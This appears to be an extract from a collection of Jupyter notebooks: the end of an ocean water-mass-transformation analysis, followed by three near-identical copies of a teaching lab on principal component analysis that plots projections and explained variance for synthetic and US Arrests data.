dVdt = dVdt.rename({'regridded':l.name+'_bin'}).assign_coords(time=E['time'])
print(' Calculating residual...')
residual = dVdt-E
print('... done.')
return E,dVdt,residual
E = {}
dVdt = {}
residual = {}
dls = [1,0.5,0.25,0.1,0.05,0.01]
for delta_l in dls:
E[delta_l],dVdt[delta_l],residual[delta_l] = calc_wmt_linearinterp(l,ps,z_l,z_i,l_snap,z_snap_l,z_snap_i,delta_l,area=grid.areacello,rho0=rho0)
###Output
Calculating WMT with linear interpolation, delta_l = 1:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.5:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.25:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.1:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.05:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.01:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
###Markdown
Figures
###Code
ndl = len(dls)
vmin=-3E7
vmax=3E7
fig,ax = plt.subplots(figsize = (5*3,5*ndl),nrows=ndl,ncols=3)
count=0
for delta_l in dls:
im = ax[count,0].pcolormesh(dVdt[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,0])
im = ax[count,1].pcolormesh(E[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,1])
im = ax[count,2].pcolormesh(residual[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,2])
count+=1
nt = len(residual[0.5]['time'])
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
for t in range(nt):
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].isel(time=t),'k-',linewidth=0.2)
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),'k-',linewidth=1)
count+=1
nt = len(residual[0.5]['time'])
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3))
for delta_l in dls:
ax.plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),linewidth=1,label=str(delta_l))
ax.legend()
t=70
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
ax[count].plot(dVdt[delta_l][l.name+'_bin'],dVdt[delta_l].isel(time=t),linewidth=1,label='dVdt')
ax[count].plot(E[delta_l][l.name+'_bin'],E[delta_l].isel(time=t),linewidth=1,label='E')
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].isel(time=t),linewidth=1,label='residual')
ax[count].legend()
count+=1
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
ax[count].plot(dVdt[delta_l][l.name+'_bin'],dVdt[delta_l].mean('time'),linewidth=1,label='dVdt')
ax[count].plot(E[delta_l][l.name+'_bin'],E[delta_l].mean('time'),linewidth=1,label='E')
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),linewidth=1,label='residual')
ax[count].legend()
count+=1
###Output
_____no_output_____ |
lab/Lab 10 - Principal Component Analysis.ipynb | ###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=scene, scene2=scene, scene_aspectmode="cube",
scene_xaxis_title="x", scene2_xaxis_title="x",
scene_yaxis_title="y", scene2_yaxis_title="y",
scene_zaxis_title="z", scene2_zaxis_title="z")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# # Multivariate Gaussian
# cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
# X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
# scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
# camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# # Circular data
# X = np.random.normal(size=(2, 1000))
# X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
# X = X @ ortho_group.rvs(3, random_state=1)
# scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
# camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
